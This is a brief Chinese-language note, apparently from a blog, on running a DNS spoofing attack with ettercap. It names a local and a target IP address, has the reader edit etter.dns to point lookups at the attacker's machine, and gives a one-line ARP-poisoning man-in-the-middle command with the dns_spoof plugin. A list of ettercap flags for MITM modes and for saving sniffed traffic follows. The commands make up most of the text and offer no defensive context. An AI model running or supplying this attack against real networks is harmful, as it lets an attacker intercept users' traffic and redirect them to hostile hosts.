本地主机:192.168.0.149 目标主机:192.168.0.138 /etc/ettercap/etter.dns,将dns欺骗到本机 ettercap -T -q -i wlan0 -P dns_spoof -M arp // // #攻击目标,网关地址 -T 文本模式 -q 安静模式 P 插件 M 开始中间人

-T 文本模式
-G 图形模式
-D 守护进程

-M中间人
-B双网卡之间进行欺骗
-M arp
-M icmp:(MAC/IP)
-M dhcp:(ip_pool/netmask/dns)

-r 读取本地文件
-w 将嗅探数据保存到本地

相关文章:

  • 2021-08-30
  • 2022-01-28
  • 2021-08-25
  • 2022-12-23
  • 2022-12-23
  • 2021-06-09
  • 2021-12-04
  • 2022-12-23
猜你喜欢
  • 2021-08-15
  • 2022-12-23
  • 2021-12-28
  • 2021-11-18
  • 2021-07-10
  • 2021-05-24
  • 2021-11-17
相关资源
相似解决方案